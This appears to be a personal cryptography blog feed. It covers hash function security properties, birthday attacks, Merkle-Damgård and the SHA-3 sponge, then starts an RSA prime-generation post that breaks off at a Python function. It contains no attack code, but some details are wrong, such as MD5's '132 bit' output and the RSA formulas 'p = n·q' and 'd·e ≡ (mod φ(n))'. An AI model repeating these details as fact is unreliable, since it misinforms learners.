<p>The general idea is to apply a unique and stable fingerprint to each input data <span class="math">\(x\)</span>. This fingerprint is computed with a hash function <span class="math">\(h\)</span> and the resulting value <span class="math">\(y = h(x)\)</span> is called a message digest. The size of <span class="math">\(h(x)\)</span> is fixed, even though the input data <span class="math">\(x\)</span> may have arbitrary length. The intended task for <span class="math">\(h\)</span> is to assign a unique identification code <span class="math">\(h(x)\)</span> for each input <span class="math">\(x \in X\)</span> where <span class="math">\(X\)</span> is the set of all possible inputs. The avid reader might realize that this task is impossible, since there is no bijective function that connects an infinite large input set <span class="math">\(X\)</span> with fixed sized output set <span class="math">\(h(x)\)</span>. Thus there must be collisions: For some inputs <span class="math">\(x_1 \neq x_2 \in X: h(x_1) = h(x_2)\)</span>. It turns out that the whole fuzz in hash function security revolves around whether there are collisions for a hash function and how they can be found.</p>
<p>The security services that are achieved with hash functions are:</p>
<ul>
<li><strong>Message authentication: </strong> This security service makes sure that a message is not altered in transmission. This property is also called <strong>Integrity</strong>. This property additionally ensures that the sender of the message unequivocally created the message. Only he knows what <span class="math">\(x\)</span> must have been, since only <span class="math">\(h(x)\)</span> was transmitted.</li>
<li><strong>Entity authentication: </strong> Enables entities to verify themselves.</li>
</ul>
<p>Hash functions without keys are sometimes also called Manipulation Detection Codes (MDC). As the name suggests, their main task is to ensure <strong>Integrity</strong>. Note that a MITM attacker <em>Oscar</em> can replace <span class="math">\((x, h(x))\)</span> with his own MDC <span class="math">\((x', h(x'))\)</span> and <em>Bob</em> has no way to recognize that this message didn't originate from <em>Alice</em>.</p>
<p>If Alice wants to authenticate her message, she must use a <strong>Message Authentication Code (MAC)</strong>. A MAC is essentially a hash function that cryptographically hashes a message together with a symmetric key: <span class="math">\(y = h_k(x)\)</span>. Alice and Bob must share a identical secret key <span class="math">\(k\)</span>. They can obtain secret keys <span class="math">\(k\)</span> by using a asymmetric key exchange protocol like <strong>Diffie-Hellman Key Exchange</strong> that is based on public key cryptography. Now when Alice sends her MAC <span class="math">\((x, h_k(x)\)</span> to Bob and Oscar replaces the message with <span class="math">\((x, h_{\tilde{k}}(x)\)</span> using his own key <span class="math">\(\tilde{k}\)</span> Bob can detect that the message was illegally tampered with since <span class="math">\(h_{\tilde{k}}(x) \neq h_k(x)\)</span>. For this reason the message is said to be authenticated as long as Alice and Bob share a secret key <span class="math">\(k\)</span>. When Bob receives a MAC <span class="math">\((x', MAC)\)</span> and Bob verifies <span class="math">\(MAC = h_k(x')\)</span>, Bob can be sure that Alice created the message, because only Alice and him own the secret key <span class="math">\(k\)</span>.</p>
<h2>Keyless Hash Functions (MDC)</h2>
<p>We assume in the following chapter that <span class="math">\(h\)</span> is a publicly known hash function such as MD5 or SHA-1. Some definitions and symbols introduced:</p>
<ul>
<li><span class="math">\(h: X \rightarrow Y\)</span> is the hash function where <span class="math">\(X\)</span> is the set of all possible messages and <span class="math">\(Y\)</span> is the set of all possible hash values. <span class="math">\(\bigm| X \bigm| = n\)</span> and <span class="math">\(\bigm| Y \bigm| = m\)</span></li>
<li>If <span class="math">\(X\)</span> is finite, we require that <span class="math">\(n \geq 2m\)</span> and we call <span class="math">\(h\)</span> a <strong>compression function</strong>. This makes intuitive sense since <span class="math">\(X\)</span> is at least double the size of <span class="math">\(Y\)</span> and <span class="math">\(h\)</span> compresses the elements of <span class="math">\(X\)</span> into the smaller set <span class="math">\(Y\)</span>.</li>
</ul>
<p>Now the main requirement for hash functions is the one-wayness of <span class="math">\(h\)</span>. This means that a <span class="math">\(y = h(x)\)</span> can be easily computed given a message <span class="math">\(x\)</span>, but the reverse, to find a <span class="math">\(x\)</span> given a message digest </p>
<div class="math">$$x=f^{-1}(y)$$</div>
<p> should be computationally unfeasible to achieve.</p>
<p>We introduce now the <strong>required security properties for hash functions</strong></p>
<h3>1. Preimage Resistance (One-Way hash function)</h3>
<p>It must be computationally unfeasible to find a message <span class="math">\(x \in X\)</span> given <span class="math">\(y=h(x)\)</span>. For example, if you find the password hashes in <code>/etc/shadow</code>, it must be computationally unfeasible to find a matching <span class="math">\(x\)</span> such that <span class="math">\(y=h(x)\)</span>.</p>
<p>In the real world, your best attack would be to just try a word-list attack. But if the password <span class="math">\(x\)</span> was truly randomly chosen and is 512 bits long, you will not recover <span class="math">\(x\)</span> from <span class="math">\(y\)</span> in this or in the next thousand generations unless <span class="math">\(h\)</span> is flawed (and not preimage resistant).</p>
<h3>2. Second Preimage Resistance (Weak Collision Resistance)</h3>
<p>It must be computationally unfeasible to find a <span class="math">\(x' \in X \backslash {x}\)</span> such that <span class="math">\(h(x') = h(x)\)</span> given a text <span class="math">\(x\)</span> and <span class="math">\(y=h(x)\)</span>. In words: Given a <span class="math">\(x\)</span>, it is computationally hard to find another <span class="math">\(x'\)</span> that computes to the same hash value. Note that <span class="math">\(x \neq x'\)</span>.</p>
<h3>3. Strong Collision Resistance</h3>
<p>It must be computationally unfeasible to find two messages <span class="math">\(x, x' \in X\)</span> such that <span class="math">\(h(x) = h(x')\)</span>. Note that <span class="math">\(x \neq x'\)</span>.</p>
<h3>Comparison of Security Properties</h3>
<p>Note that strong collision resistance is a much tougher security property to achieve, since the attacker can choose any <span class="math">\(x\)</span> and <span class="math">\(x'\)</span> (Two degrees of freedom). Second preimage resistance instead fixes <span class="math">\(x\)</span> and requires the attacker to find another <span class="math">\(x'\)</span> that hashes to the same value as <span class="math">\(x\)</span> (1 degree of freedom).</p>
<p>It can be proofed that strong collision resistant hash functions are preimage resistant and weakly collision resistant.</p>
<p>It's obvious that a strongly collision resistant hash function is also weakly collision resistant, since we can just fix all <span class="math">\(x \in X\)</span> and for each fixed message, the hash function is weakly collision resistant.</p>
<p>But why is a strong collision resistant hash function also preimage resistant (one-way function)? If your hash function is strongly collision resistant, you won't be able to compute any <span class="math">\(x, x' \in X\)</span> such that <span class="math">\(h(x) = h(x')\)</span>. Therefore you also won't find any <span class="math">\(x\)</span> such that <span class="math">\(y=h(x)\)</span>. (Proof needed.)</p>
<h3>The Random Oracle Model (ROM)</h3>
<p>We introduce a model where we obtain an upper bound of the resources needed to launch an attack against hash functions <span class="math">\(h\)</span>. The ROM gives us an idealized cryptographic hash function such that we obtain a random function <span class="math">\(h: X \rightarrow Y\)</span> from all possible <span class="math">\(m^n\)</span> functions.</p>
<p>This means that an attacker gets to know how the hash function works only if he asks the ROM for the hash values of a series of messages. Because the ROM creates a random hash function, it remains hard to predict <span class="math">\(h(x)\)</span> if the attacker receives a series of hash values for some messages. In reality, <span class="math">\(h\)</span> is not random and the attacker does know how the hash functions work. However, those public functions are intended to behave like a ROM.</p>
<p>Therefore the ROM requires that the probability that <span class="math">\(Pr(h(x)=y|h(x_i) = y_i \text{ for } i=1,..,k) = \frac{1}{m}\)</span>. In words: Even though the attacker knows <span class="math">\(k\)</span> hash values for <span class="math">\(k\)</span> texts, he cannot predict any better what the next text <span class="math">\(x_{k+1}\)</span> hashes to than <span class="math">\(1/m\)</span>.</p>
<p>Now what is the probability of an attacker in the ROM to find an pre-image for some <span class="math">\(y=h(x)\)</span>?</p>
<p>If the attacker Oscar queries the ROM <span class="math">\(q\)</span> times with messages <span class="math">\(\{x_1, x_2, ..., x_q\}\)</span> and the probability to query with a <em>correct</em> <span class="math">\(x_i\)</span> remains <span class="math">\(1/m\)</span> (as suggested), then the probability to <strong>not find an pre-image q times</strong> is <span class="math">\((1-\frac{1}{m})^q\)</span>. The probability to find such a pre-image is </p>
<div class="math">$$1-(1-\frac{1}{m})^q \approx q/m$$</div>
<p> The probability too find a second pre-image (weak collision resistance) is accordingly </p>
<div class="math">$$1-(1-\frac{1}{m})^{q-1} \approx q/m$$</div>
<p>To get a <span class="math">\(50%\)</span> chance to find a pre-image, you need to query the ROM with <span class="math">\(q=m/2\)</span> queries. When the hash function has a output length of <span class="math">\(2^{160}\)</span>, you will need to query <span class="math">\(2^{159}\)</span> times.</p>
<h4>Attack on Collision Resistance with Birthday Paradox</h4>
<p>The birthday paradox demonstrates a way to attack hash functions with strong collision resistance. It states that the probability to find a collision <span class="math">\((x, x')\)</span> is </p>
<div class="math">$$p=1-\frac{(m-1)(m-2)\cdot...\cdot(m-q+1)}{m^{q-1}}$$</div>
<p> when you query the ROM with <span class="math">\(q\)</span> messages <span class="math">\(x_1, ..., x_q\)</span>.</p>
<p>This makes intuitively sense, since the probability to find a collision depends on whether the comparison between any possible pairs of your queries message digest yields a tuple <span class="math">\((x, x')\)</span> for which <span class="math">\(h(x) = h(x')\)</span>. The <span class="math">\(q+1\)</span> time you query the ROM you have a probability of about <span class="math">\(q/m\)</span> that there is a collision. The <span class="math">\(q+2\)</span> time the probability rises to <span class="math">\(\frac{q+1}{m}\)</span>. This observation can be written formally as </p>
<div class="math">$$p = 1 - \frac{m-1}{m}\cdot\frac{m-2}{m} \cdot\cdot\cdot \frac{m-q+1}{m}$$</div>
<p> For what <span class="math">\(q\)</span> do we achieve a probability for a collision of <span class="math">\(0.5\)</span>?</p>
<p>Let <span class="math">\(p\)</span> be the probability to find a collision after <span class="math">\(q\)</span> queries. Let </p>
<div class="math">$$1-x \approx e^{-x}$$</div>
<p>Then <span class="math">\(p = 1-\prod_{i=1}^{q-1} \left(1-i/m\right) = ... = 1-e^{-\frac{q^2}{2m}} = q^2/2m\)</span> and we see </p>
<div class="math">$$p = q^2/2m \Leftrightarrow q = \sqrt{p \cdot 2m}$$</div>
<p>When p is close to zero, we obtain an estimation for <span class="math">\(q\)</span> as </p>
<div class="math">$$q \approx c\sqrt{m}$$</div>
<p> with some constant <span class="math">\(c=1.17\)</span>.</p>
<p>This essentially means that with the <strong>Birthday Attack</strong>, to obtain a fifty-fifty chance to find a collision, we need to query the ROM <span class="math">\(\sqrt{2^m} = 2^{m/2}\)</span> times where <span class="math">\(m\)</span> is the bitlength of the hash function. For example, you need to calculate <span class="math">\(2^{128/2} = 2^{64}\)</span> MD5 hashes to find any collision. This is totally feasible nowadays.</p>
<h3>Merkle-Damgård Construction and Iterated Hash functions</h3>
<p>Given a collision resistant compression function </p>
<div class="math">$$h: \{0,1\}^{m} \times \{0,1\}^{t} \rightarrow \{0,1\}^{m}$$</div>
<p> the goal of iterated hash functions (such as the Merkle-Damgård Construction) is to create a collision-resistant hash function <span class="math">\(\tilde{h}\)</span> </p>
<div class="math">$$\tilde{h}: \{0,1\}^{\ast} \rightarrow \{0,1\}^{l}$$</div>
<p> that hashes arbitrary sized messages to a message digest of bitlength <span class="math">\(l\)</span>. Note that the compression function takes two inputs, one with bitlength <span class="math">\(m\)</span> and one with bitlength <span class="math">\(t\)</span>.</p>
<p>In words: The main task of the Merkle-Damgård Construction (MD) is too extend the domain of a collision free compression function to arbitrary sized messages. MD divides arbitrary sized messages into fixed blocks and adds a secure padding (preprocessing step). Then MD uses the output of the compression function of one block as the input together with the next block for a new iteration of the compression function until all blocks have been processed (processing step). Formally, those steps can be written as:</p>
<ul>
<li><strong>Preprocessing: </strong>Transform any input <span class="math">\(x \in \{0,1\}^{\ast}\)</span> into <span class="math">\(r\)</span> blocks of size <span class="math">\(t\)</span> such that the transformed string <span class="math">\(y(x) = y_1||y_2||...||y_r\)</span> is dividable by <span class="math">\(t\)</span>: <span class="math">\(|y(x)| \equiv_t 0\)</span> As we will see, MD adds a certain padding in the preprocessing step in order for the construction to be secure.</li>
<li><strong>Processing: </strong> <span class="math">\(\text{IV}\)</span> is a publicly known initialization vector of size <span class="math">\(m\)</span> (<span class="math">\(m\)</span> zero Bits in the case of MD). We compute a series of values <span class="math">\(z_0, z_1, ..., z_r\)</span> by calling the compression function <span class="math">\(r\)</span> times such that <div class="math">$$z_0 = \text{IV}$$</div> and <div class="math">$$z_i = h(z_{i-1} || y_i)$$</div>
</li>
<li><strong>Final Step: </strong> Output <span class="math">\(z_r\)</span> as the final hash value, then <span class="math">\(m=l\)</span>. Optionally transform <span class="math">\(z_r\)</span> with a final transformation function <span class="math">\(\text{transform}: \{0,1\}^{m} \rightarrow \{0,1\}^{l}\)</span></li>
</ul>
<p>We want the preprocessing function <span class="math">\(y\)</span> to be <strong>suffix free</strong>, because we can then prove that our final hash function <span class="math">\(\tilde{h}\)</span> is collision resistant. In other words: The goal is to prove that we can find a collision in the hash function only if we can find a collision in the compression function.</p>
<p>Our preprocessing function <span class="math">\(y\)</span> is suffix free, if there are no strings <span class="math">\(x \neq x', z \in \{0,1\}^{\ast}\)</span> such that <span class="math">\(y(x) = z||y(x')\)</span>. A suffix in computer science is usually something added at the end of a string, such as the file ending <code>.txt</code>.</p>
<p><span class="math">\(y\)</span> would <strong>NOT</strong> be suffix free, if messages would just be padded with constant zeroes in order to form a message that is a multiple of <span class="math">\(t\)</span>: <span class="math">\(|y(x)| \equiv_t 0\)</span>.</p>
<p>Example: If <span class="math">\(t=8 \text{ Bytes}\)</span> and we have the two messages <span class="math">\(x=\text{Hello} \neq x'=\text{Hello00}\)</span> and pad them with our zero padding, we obtain a collision <span class="math">\(y(x) = y(x')\)</span> even though <span class="math">\(x \neq x'\)</span>. Therefore zero padding is a insecure padding.</p>
<p>There are many Merkle-Damgård complient padding schemes. The original padding scheme is <strong>length-padding</strong>, whereby <span class="math">\(r\)</span> blocks of size <span class="math">\(t\)</span> are created. The first bit of each block is always 1 (except in the first block, there the first bit is a 0). In the <span class="math">\((r-1)\text{th}\)</span> block of the padding we fill the remaining space with exactly <span class="math">\(d\)</span> zero bits. In the <span class="math">\(r\text{-th}\)</span> block we binary encode the length of <span class="math">\(d\)</span>. Alternatively we can binary encode the length of the whole message in the last block. It's the same, because <span class="math">\(d\)</span> is a function of the size of the message.</p>
<p>In short, <strong>length-padding</strong> transforms an input message in such a way that there are <span class="math">\(r\)</span> blocks of size <span class="math">\(t\)</span> and the next to last block is filled with zero bits in order to obtain a length of the block size <span class="math">\(t\)</span>. The last block is a binary representation of the original message length. The message length encoding must be at a fixed position in the last block to be resistant against length extension attacks.</p>
<p>It turns out that length encoding is the simplest form of a padding that is suffix free. You can read the formally correct proof here: <a href="https://eprint.iacr.org/2009/325.pdf">Characterizing Padding Rules of MD Hash Functions
Preserving Collision Security</a>.</p>
<p>The informal proof sketch is taken from <a href="https://crypto.stackexchange.com/questions/1427/why-does-the-padding-in-merkle-damg%C3%A5rd-hash-functions-like-md5-contain-the-messa">stackexchange</a>. Assume we have a collision in our hash function. We show that there must be a collision in the underlying compression function if two distinct inputs are length-padded (and thus suffix free).</p>
<ul>
<li>If the distinct messages have different length, then a collision in the compression function must occur in the last block, because the last block holds the binary length of the message and the length is different, even though the value of the compression function is identical.</li>
<li>If the messages are of the same length, then there is a well defined rightmost block in the MD-chain where the messages differ, but the output of the compression function is equal. Thus the collision is in the compression function. It can be shown with induction that somewhere in the chain must be two distinct inputs to the compression function which yields an identical output.</li>
</ul>
<h3>Hash Functions based on the Merkle-Damgård Construction</h3>
<p>MD4, MD5, SHA-1 and SHA-2 are all based on the MD construction. MD4 and MD5 use little endian representation of words, SHA uses big endian. The compression function of MD4 (1990) is broken, it's possible to find collisions after <span class="math">\(2^{20}\)</span> queries to the ROM. MD5 (1991) is a improved version of MD4, with an additional fourth round and other constants in the compression function. MD5 is also not collision resistant anymore and shouldn't be used any longer.</p>
<p>SHA-1 is also based on MD construction and is the successor of the MD4, MD5 family. Instead of 132 bit output length, SHA-1 has 160 bit output length. SHA-1 is still in use today and is still considered more or less secure.</p>
<p>In 2001 and 2004 NIST published 224, 256, 384 and 512 bit variants of the SHA family. They are regarded as the SHA-2 family. The output length varies and the internal functionality such as the number of rounds/shift amounts/constants of the compression function is different to SHA-1.</p>
<p>In 2012 Keccak (SHA-3) was presented as the successor of SHA-1 and SHA-2. Although SHA-2 is still considered secure, SHA-3 is build on a completely different architecture than the Merkle-Damgård Construction. The idea is to have a strong and standardized hash function that doesn't builds on the MD construction.</p>
<h3>Sponge Construction and Keccak (SHA-3)</h3>
<p>The sponge construction is the internal architecture of the SHA-3 hash function. It can be used to compute a hash value or to generate pseudo-random bits. Keccak can be divided into two phases:</p>
<ul>
<li><strong>Absorbing phase</strong>: Message blocks are passed to the algorithm.</li>
<li><strong>Squeezing phase</strong>: Output of configurable length is computed. When Keccak is used as SHA-3, only <span class="math">\(y_0\)</span> of <span class="math">\(y_0...\)</span>_n$ is taken from the output.</li>
</ul>
<p>Illustration of the sponge construction (Image from Wikipedia):</p>
<p><img alt="sponge construction" src="https://upload.wikimedia.org/wikipedia/commons/7/70/SpongeConstruction.svg"></p>
<p>Instead of using a compression function, the sponge construction uses internally a permutation </p>
<div class="math">$$f: \{0,1\}^b \rightarrow \{0,1\}^b$$</div>
<p> which is iteratively applied. <span class="math">\(b = r+c\)</span> whereby <span class="math">\(c\)</span> is called the capacity and considered to be the internal state of the sponge construction. <span class="math">\(r\)</span> is called the bit rate and is equal to the length of a message block. <span class="math">\(r\)</span> is also said to be the external state of the sponge, because only the first <span class="math">\(r\)</span> bits are extracted in the squeezing phase.</p>
<p>For SHA-3 a state of <span class="math">\(b=1600\)</span> bits is used. The two combinations <span class="math">\((r,c) = (1344, 256)\)</span> and <span class="math">\((r,c) = (1088, 512)\)</span> are allowed.</p>
<p>Before the actual sponge construction can be used, a message is padded with a sponge conform padding function. The padding function <span class="math">\(\text{pad}\)</span> essentially looks like </p>
<div class="math">$$\text{pad(m)} = m||P10^{\ast}1$$</div>
<p> The padding function appends a bit string <span class="math">\(P\)</span> followed by zero or more zeros terminated by a 1 at the input message <span class="math">\(m\)</span>. <span class="math">\(P\)</span> depends on the mode and the output length. After the padding, the padded message is a multiple of the bit length <span class="math">\(k \cdot r\)</span> where <span class="math">\(k\)</span> is the number of blocks.</p>
<p>The actual sponge construction can be defined for a sponge conform padding <span class="math">\(y\)</span>, a permutation <span class="math">\(f\)</span>. Let <span class="math">\(x \in \{0,1\}^{\ast}\)</span> and let <span class="math">\(y(x) = y_1, y_2, ..., y_k\)</span> with length of <span class="math">\(|y_i|=r\)</span>. We define the states <span class="math">\(s_i, i \geq 0:\)</span></p>
<div class="math">$$s_i = 0^b, \text{ if } i=0$$</div>
<p> which initializes the sponge construction and
</p>
<div class="math">$$s_i = f(s_{i-1} \oplus (y_i||0^c)), \text{ if } 1 \leq i \leq k$$</div>
<p> which is called the <strong>Absorbing Phase</strong> which XORs the result from the previous permutation with the current message block <span class="math">\(y_i\)</span> padded with <span class="math">\(c\)</span> zero bits. Then follows
</p>
<div class="math">$$s_i = f(s_{i-1}), \text{ if } i > k$$</div>
<p> which is called the <strong>Squeezing phase</strong>. When only the first result from the <strong>Squeezing phase</strong> is used, we obtain a SHA-3 value. The further results may be used as pseudo-random numbers.</p>
<p>The actual results from the sponge construction are the first <span class="math">\(r\)</span> bits from the squeezing phase <span class="math">\(z_i = s_{k+i-1}\)</span> for <span class="math">\(i \geq 1\)</span>. Because r is either <span class="math">\(1088\)</span> or <span class="math">\(1344\)</span>, only as many bits as required for the intended security level are taken.</p>
<p>It can be shown that to obtain a inner collision, you must evaluate <span class="math">\(q \approx c \cdot 2^{c/2}\)</span> hash values. <span class="math">\(c\)</span> is either 256 or 512 and thus sufficiently large. Pre-image resistance is also <span class="math">\(min(c/2, n)\)</span> where n is the chose output length. This is the roughly the same as what can be achieved with the birthday attack.</p>
<p>The permutation function <span class="math">\(f\)</span> consists of seven bijective functions that manipulate the state. The internal state of Keccak can be represented as a <span class="math">\(5x5xw\)</span> cube where <span class="math">\(w\)</span> is the wordsize of Keccak and <span class="math">\(w=64\)</span>. Therefore the functions can be written as </p>
<div class="math">$$f: \{0,1\}^{5x5x64} \rightarrow \{0,1\}^{5x5x64}$$</div>
<p>It's not of particular interest how the permutation function works. Readers who are interested can read a very nice introduction of <a href="https://pdfs.semanticscholar.org/8450/06456ff132a406444fa85aa7b5636266a8d0.pdf">Christof Paar here</a>.</p>
<script type="text/javascript">if (!document.getElementById('mathjaxscript_pelican_#%@#$@#')) {
var align = "left",
indent = "0em",
linebreak = "false";
if (false) {
align = (screen.width < 768) ? "left" : align;
indent = (screen.width < 768) ? "0em" : indent;
linebreak = (screen.width < 768) ? 'true' : linebreak;
}
var mathjaxscript = document.createElement('script');
mathjaxscript.id = 'mathjaxscript_pelican_#%@#$@#';
mathjaxscript.type = 'text/javascript';
mathjaxscript.src = 'https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.3/latest.js?config=TeX-AMS-MML_HTMLorMML';
var configscript = document.createElement('script');
configscript.type = 'text/x-mathjax-config';
configscript[(window.opera ? "innerHTML" : "text")] =
"MathJax.Hub.Config({" +
" config: ['MMLorHTML.js']," +
" TeX: { extensions: ['AMSmath.js','AMSsymbols.js','noErrors.js','noUndefined.js'], equationNumbers: { autoNumber: 'none' } }," +
" jax: ['input/TeX','input/MathML','output/HTML-CSS']," +
" extensions: ['tex2jax.js','mml2jax.js','MathMenu.js','MathZoom.js']," +
" displayAlign: '"+ align +"'," +
" displayIndent: '"+ indent +"'," +
" showMathMenu: true," +
" messageStyle: 'normal'," +
" tex2jax: { " +
" inlineMath: [ ['\\\\(','\\\\)'] ], " +
" displayMath: [ ['$$','$$'] ]," +
" processEscapes: true," +
" preview: 'TeX'," +
" }, " +
" 'HTML-CSS': { " +
" availableFonts: ['STIX', 'TeX']," +
" preferredFont: 'STIX'," +
" styles: { '.MathJax_Display, .MathJax .mo, .MathJax .mi, .MathJax .mn': {color: 'black ! important'} }," +
" linebreaks: { automatic: "+ linebreak +", width: '90% container' }," +
" }, " +
"}); " +
"if ('default' !== 'default') {" +
"MathJax.Hub.Register.StartupHook('HTML-CSS Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax['HTML-CSS'].FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"MathJax.Hub.Register.StartupHook('SVG Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax.SVG.FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"}";
(document.body || document.getElementsByTagName('head')[0]).appendChild(configscript);
(document.body || document.getElementsByTagName('head')[0]).appendChild(mathjaxscript);
}
</script>How to find large prime numbers for RSA with the Miller-Rabin Primality Test2018-08-12T19:05:00+02:002018-08-13T21:50:00+02:00Nikolai Tschachertag:incolumitas.com,2018-08-12:/2018/08/12/finding-large-prime-numbers-and-rsa-miller-rabin-test/<h2>Introduction</h2>
<p>All sources for this blog post can be found in the <a href="https://github.com/NikolaiT/Large-Primes-for-RSA">Github repository about large primes</a>. The most recent version of the sources may only be found in the Github repository.</p>
<p>It has been a long time since I found the energy to write a new blog post. In this article, I am going to dig into a interesting area of cryptography: The task to <strong>find large prime numbers</strong>. We hopefully are all familiar with the concept of prime numbers. Prime numbers are integers <span class="math">\(p\)</span> which are dividable only by <span class="math">\(p\)</span> itself and <span class="math">\(1\)</span>. But why is it necessary to find large prime numbers in the area of cryptography?</p>
<p>One of the first asymmetric cryptosystems invented was RSA (1977). As all public key algorithms, the security of RSA depends on the existence of a one-way function.</p>
<p>In the case of RSA, the one-way function is built on top of the integer factorization problem: Given two prime numbers <span class="math">\(p,q\in \mathbb{N}\)</span>, it is straightforward to calculate <span class="math">\(n=p \cdot q\)</span>, but it is computationally infeasible to reverse this multiplication by finding the factors <span class="math">\(p\)</span> and <span class="math">\(q\)</span> given the product <span class="math">\(n\)</span>. Even when the primes <span class="math">\(p\)</span> and <span class="math">\(q\)</span> are …</p><h2>Introduction</h2>
<p>All sources for this blog post can be found in the <a href="https://github.com/NikolaiT/Large-Primes-for-RSA">Github repository about large primes</a>. The most recent version of the sources may only be found in the Github repository.</p>
<p>It has been a long time since I found the energy to write a new blog post. In this article, I am going to dig into a interesting area of cryptography: The task to <strong>find large prime numbers</strong>. We hopefully are all familiar with the concept of prime numbers. Prime numbers are integers <span class="math">\(p\)</span> which are dividable only by <span class="math">\(p\)</span> itself and <span class="math">\(1\)</span>. But why is it necessary to find large prime numbers in the area of cryptography?</p>
<p>One of the first asymmetric cryptosystems invented was RSA (1977). As all public key algorithms, the security of RSA depends on the existence of a one-way function.</p>
<p>In the case of RSA, the one-way function is built on top of the integer factorization problem: Given two prime numbers <span class="math">\(p,q\in \mathbb{N}\)</span>, it is straightforward to calculate <span class="math">\(n=p \cdot q\)</span>, but it is computationally infeasible to reverse this multiplication by finding the factors <span class="math">\(p\)</span> and <span class="math">\(q\)</span> given the product <span class="math">\(n\)</span>. Even when the primes <span class="math">\(p\)</span> and <span class="math">\(q\)</span> are very large integers (say with lengths of <span class="math">\(2^{1024}\)</span>), multiplication is computationally efficient. Prime factorization however is a <a href="https://en.wikipedia.org/wiki/Integer_factorization">computationally hard problem</a>. This one-way property is exploited in the asymmetric cryptostystem RSA.</p>
<p>In the following sections we introduce the necessary RSA cryptosystem theory and the required algorithms to implement RSA in a simple Python program. Please never use the resulting code in production, because I am most likely introducing some mistakes that comprise the security of the cryptosystem.</p>
<h2>RSA</h2>
<p>RSA is a public key crypytosystem that can be used for confidentiality, accountability and digitial signatures. Therefore every participant creates a public and a private key. In RSA, the private key is denoted as <span class="math">\(K_{private}=(d)\)</span> and the public key is <span class="math">\(K_{public}=(e,n)\)</span>. All operations within RSA are conducted in the ring <span class="math">\(\mathbb{Z_{n}}=\{0,1,...,n-1\}\)</span> and the numbers <span class="math">\(n,d,e\)</span> are usually very large integers with bitlengths larger then 512.</p>
<h3>Encryption</h3>
<p>To encrypt the plaintext <span class="math">\(x \in \mathbb{Z_{n}}\)</span>, the function</p>
<div class="math">$$y=e_{K_{public}}(x) \equiv x^e \pmod n$$</div>
<p>is calculated, whereby the ciphertext <span class="math">\(y\)</span> again is a element of <span class="math">\(\mathbb{Z_{n}}\)</span>.</p>
<h3>Decryption</h3>
<p>To decrypt the ciphertext <span class="math">\(y\)</span>, the private key <span class="math">\(K_{private}=(d)\)</span> is needed:</p>
<div class="math">$$x = d_{K_{private}}(y) \equiv y^d \pmod n$$</div>
<p>Encryption and Decryption is essentially modular exponentiation within the ring <span class="math">\(\mathbb{Z_{n}}\)</span>. This means that we need to perform a very large exponentiation with exponents with bitlengths of <span class="math">\(1024\)</span> and more. It turns out that there is a fast algorithm to perform this computation: <strong>The square-and-multiply algorithm.</strong></p>
<p>This straightforward approach leaves us however with several requirements:</p>
<ul>
<li>It must be computationally infeasible to determine the private key <span class="math">\(d\)</span> from the public key <span class="math">\((e,n)\)</span>.</li>
<li>The amount of data that can be encrypted can be maximally <span class="math">\(n\)</span>. When we chose <span class="math">\(n=2^{1024}\)</span>, we may encrypt <span class="math">\(1024\)</span> bits at once. Keep in mind that asymmetric cryptography is not intended for encryption of large datasets anyways. The usual approach is to exchange a symmetric session key with public key cryptography and then to continue working with symmetric block ciphers like AES. Therefore, the limited amount of data that can be encrypted at once does not pose a practical limitation.</li>
</ul>
<h3>Key Generation for RSA</h3>
<p>Key generation for the public key <span class="math">\(K_{public}=(e,n)\)</span> and the private key <span class="math">\(K_{private}=(d)\)</span> is done by the following algorithm:</p>
<ol>
<li>Find two large primes <span class="math">\(p\)</span> and <span class="math">\(q\)</span> with bit-lengths of at least <span class="math">\(1024\)</span> bit</li>
<li>Calculate <span class="math">\(p=n \cdot q\)</span></li>
<li>Compute Euler's totient function <div class="math">$$\phi(n) = (q-1) \cdot (p-1)$$</div>
</li>
<li>Choose a public exponent <span class="math">\(e \in \{1,2,...,\phi(n)-1\}\)</span> such that <div class="math">$$gcd(e, \phi(n)) = 1$$</div>
</li>
<li>Find the private key <span class="math">\(K_{private}=(d)\)</span> such that <div class="math">$$d \cdot e \equiv \pmod{\phi(n)}$$</div>
</li>
</ol>
<p>Finding keys <span class="math">\(d\)</span> and <span class="math">\(e\)</span> is done by randomly picking a public key <span class="math">\(e \in \{0,1,...,\phi(n)-1\}\)</span> and check whether <span class="math">\(e\)</span> satisfies <span class="math">\(gcd(e, \phi(n)) = 1\)</span>. If this isn't the case, you can simply pick another public key <span class="math">\(e\)</span>. We then apply the Extended Euclidean Algorithm (EEA) with the parameters <span class="math">\(n\)</span> and <span class="math">\(e\)</span> and obtain the equation</p>
<div class="math">$$gcd(\phi(n), e) = s \cdot \phi(n) + t \cdot e$$</div>
<p>The parameter <span class="math">\(t\)</span> computed by the EEA is the the inverse of <span class="math">\(e\)</span> and therefore <span class="math">\(d = t \pmod{\phi(n)}\)</span>. The parameter <span class="math">\(s\)</span> can be ignored for the purpose of RSA.</p>
<h4>Extended Euclidean Algorithm (EEA)</h4>
<p>As mentioned before, we need to compute <span class="math">\(gcd(\phi(n), e)\)</span> after we have chosen the public key exponent <span class="math">\(e \in \{1,2,...,\phi(n)-1\}\)</span> to obtain the form:
</p>
<div class="math">$$gcd(\phi(n), e) = s \cdot \phi(n) + t \cdot e$$</div>
<p> where <span class="math">\(s\)</span> and <span class="math">\(t\)</span> are integer coefficients. This can be done by computing the standard Euclidean Algorithm and simultaneously calculating the current remainder <span class="math">\(r_i\)</span> as <span class="math">\(r_i = s_i \cdot r_0 + t_i \cdot r_1\)</span>.
The EEA algorithm is implemented below in Python. This implementation is not very efficient and not pretty at all, but it is sufficient for our purposes.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python</span>
<span class="c1"># -*- coding: utf-8 -*-</span>
<span class="k">def</span> <span class="nf">EEA</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
<span class="sd">"""</span>
